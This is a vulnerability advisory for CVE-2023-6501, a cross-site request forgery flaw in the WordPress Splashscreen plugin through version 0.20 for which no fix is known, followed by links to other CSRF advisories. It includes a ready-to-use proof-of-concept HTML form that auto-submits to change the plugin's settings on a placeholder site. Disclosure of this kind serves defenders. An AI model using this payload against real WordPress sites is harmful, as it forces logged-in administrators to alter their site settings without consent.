Splashscreen <= 0.20 – Settings Update via CSRF | CVE 2023-6501 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=splashscreen.php" method="POST">
    <input type="text" name="splashscreen_type" value="dGVtcGxhdGUuaHRt">
    <input type="text" name="splashscreen_excludedpaths" value="">
    <input type="text" name="splashscreen_submit" value="Update">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-6501.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

dd19189b-de04-44b6-8ac9-0c32399a8976

Timeline

Publicly Published

2024-01-19 (about 3 months ago)

Added

2024-01-19 (about 3 months ago)

Last Updated

2024-01-19 (about 3 months ago)

Other

Published

Title

Published

2021-09-15

Title

SEO Redirection < 7.9 - Arbitrary Redirect Deletion via CSRF

Published

2024-01-29

Title

CP Media Player < 1.2.0 - Player Deletion and Duplication via CSRF

Published

2024-04-22

Title

WP ADA Compliance Check Basic – Most Comprehensive Web Accessibility Solution for WordPress < 3.1.4 - Cross-Site Request Forgery

Published

2021-06-30

Title

WP Prayer < 1.5.5 - Unauthorised AJAX call via CSRF

Published

2023-09-11

Title

WooCommerce Subscriptions < 4.6.0 - Subscription Suspension/Activation via CSRF